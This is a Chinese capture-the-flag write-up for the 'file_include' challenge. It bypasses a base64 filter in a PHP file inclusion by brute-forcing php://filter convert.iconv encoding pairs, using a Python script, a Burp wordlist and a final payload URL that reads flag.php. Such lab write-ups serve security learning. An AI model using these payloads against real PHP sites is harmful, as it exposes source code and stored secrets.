技术共享

攻防世界(PHP过滤器过滤)file_include

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

转换过滤器官方文档:https://www.php.net/manual/zh/filters.convert.php#filters.convert.iconv

这道题因为convert.base64-encode被过滤掉了,所以使用convert.iconv.*过滤器

在激活 iconv 的前提下可以使用 convert.iconv.* 压缩过滤器, 等同于用 iconv() 处理所有的流数据。 该过滤器不支持参数,但可使用输入/输出的编码名称,组成过滤器名称,比如 convert.iconv.<input-encoding>.<output-encoding> 或 convert.iconv.<input-encoding>/<output-encoding> (两种写法的语义都相同)。

直接上脚本爆破出合适的编码:

  1. import requests
  2. in_encodings = ['UCS-4*', 'UCS-4BE', 'UCS-4LE*', 'UCS-2', 'UCS-2BE', 'UCS-2LE', 'UTF-32*', 'UTF-32BE*', 'UTF-32LE*', 'UTF-16*', 'UTF-16BE*', 'UTF-16LE*', 'UTF-7', 'UTF7-IMAP', 'UTF-8*', 'ASCII*', 'EUC-JP*', 'SJIS*', 'eucJP-win*', 'SJIS-win*', 'ISO-2022-JP', 'ISO-2022-JP-MS', 'CP932', 'CP51932', 'SJIS-mac', 'SJIS-Mobile#DOCOMO', 'SJIS-Mobile#KDDI', 'SJIS-Mobile#SOFTBANK', 'UTF-8-Mobile#DOCOMO', 'UTF-8-Mobile#KDDI-A', 'UTF-8-Mobile#KDDI-B', 'UTF-8-Mobile#SOFTBANK', 'ISO-2022-JP-MOBILE#KDDI', 'JIS', 'JIS-ms', 'CP50220', 'CP50220raw', 'CP50221', 'CP50222', 'ISO-8859-1*', 'ISO-8859-2*', 'ISO-8859-3*', 'ISO-8859-4*', 'ISO-8859-5*', 'ISO-8859-6*', 'ISO-8859-7*', 'ISO-8859-8*', 'ISO-8859-9*', 'ISO-8859-10*', 'ISO-8859-13*', 'ISO-8859-14*', 'ISO-8859-15*', 'ISO-8859-16*', 'byte2be', 'byte2le', 'byte4be', 'byte4le', 'BASE64', 'HTML-ENTITIES', '7bit', '8bit', 'EUC-CN*', 'CP936', 'GB18030', 'HZ', 'EUC-TW*', 'CP950', 'BIG-5*', "CP{949}", "CP{775}"]
  3. out_codings = in_encodings[:]
  4. for inenc in in_encodings:
  5. for outenc in out_codings:
  6. url = 'http://61.147.171.105:62135/?filename=php://filter/convert.iconv.{}.{}/resource=flag.php'.format(inenc,outenc)
  7. res = requests.get(url)
  8. if "flag" in res.text:
  9. print("inenc is:{},outenc is:{}".format(inenc,outenc))
  10. print(res.text)

burp爆破用这个字典

  1. UCS-4*
  2. UCS-4BE
  3. UCS-4LE*
  4. UCS-2
  5. UCS-2BE
  6. UCS-2LE
  7. UTF-32*
  8. UTF-32BE*
  9. UTF-32LE*
  10. UTF-16*
  11. UTF-16BE*
  12. UTF-16LE*
  13. UTF-7
  14. UTF7-IMAP
  15. UTF-8*
  16. ASCII*
  17. EUC-JP*
  18. SJIS*
  19. eucJP-win*
  20. SJIS-win*
  21. ISO-2022-JP
  22. ISO-2022-JP-MS
  23. CP932
  24. CP51932
  25. SJIS-mac
  26. SJIS-Mobile#DOCOMO
  27. SJIS-Mobile#KDDI
  28. SJIS-Mobile#SOFTBANK
  29. UTF-8-Mobile#DOCOMO
  30. UTF-8-Mobile#KDDI-A
  31. UTF-8-Mobile#KDDI-B
  32. UTF-8-Mobile#SOFTBANK
  33. ISO-2022-JP-MOBILE#KDDI
  34. JIS
  35. JIS-ms
  36. CP50220
  37. CP50220raw
  38. CP50221
  39. CP50222
  40. ISO-8859-1*
  41. ISO-8859-2*
  42. ISO-8859-3*
  43. ISO-8859-4*
  44. ISO-8859-5*
  45. ISO-8859-6*
  46. ISO-8859-7*
  47. ISO-8859-8*
  48. ISO-8859-9*
  49. ISO-8859-10*
  50. ISO-8859-13*
  51. ISO-8859-14*
  52. ISO-8859-15*
  53. ISO-8859-16*
  54. byte2be
  55. byte2le
  56. byte4be
  57. byte4le
  58. BASE64
  59. HTML-ENTITIES
  60. 7bit
  61. 8bit
  62. EUC-CN*
  63. CP936
  64. GB18030
  65. HZ
  66. EUC-TW*
  67. CP950
  68. BIG-5*
  69. EUC-KR*
  70. UHC
  71. ISO-2022-KR
  72. Windows-1251
  73. Windows-1252
  74. CP866
  75. KOI8-R*
  76. KOI8-U*
  77. ArmSCII-8

选集束炸弹模式,我这里没有爆破完已经出来能用的了

dirsearch扫出还有个flag.php,flag应该就在这里面

构造payload:

http://61.147.171.105:62135?filename=php://filter/convert.iconv.UTF-8*.UTF-32*/resource=flag.php